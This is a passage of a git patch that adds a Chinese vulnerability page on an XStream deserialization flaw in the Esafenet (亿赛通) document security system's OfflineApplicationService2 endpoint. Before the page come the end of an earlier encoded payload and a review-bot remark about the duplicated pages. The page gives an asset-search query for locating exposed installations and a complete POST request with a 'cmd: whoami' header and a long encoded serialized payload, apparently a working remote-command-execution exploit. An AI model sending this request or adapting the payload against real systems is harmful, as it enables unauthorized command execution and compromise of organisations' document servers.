MHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIG
HCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAO
CAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFD
PHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFL
NAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEG
AEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605198795-d3a9b7aa-b389-4748-b8a1-594abba52587.png](./img/GjCIUT029FqNfeNV/1706605198795-d3a9b7aa-b389-4748-b8a1-594abba52587-124915.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fir8aulb9lzzwptq> \ No newline at end of file 
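Review bot: this hunk duplicates the ODMSubmitApplyService page verbatim (same headers, same `Content-Length: 14756`, same encoded body, same login-page screenshot filename `1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png` under a different image directory) with only the path changed to `/CDGServer3/OfflineApplicationService1`, and the next file in the patch does the same for `OfflineApplicationService2`, so any correction to the payload, its explanation or the expected response has to be made three times. Consider one page that lists every `/CDGServer3/*` endpoint accepting this body and shows the request once, or at least a cross-reference between the three pages. The file also ends without a trailing newline (`\ No newline at end of file`); add it for consistency with the rest of the repository.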
diff --git a/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md new file mode 100644 index 0000000..8e8b216 --- /dev/null +++ b/亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统OfflineApplicationService2存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/RHal_2krZDLiIbZ5/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-959292.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/OfflineApplicationService2 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMB
FEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMO
AJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBM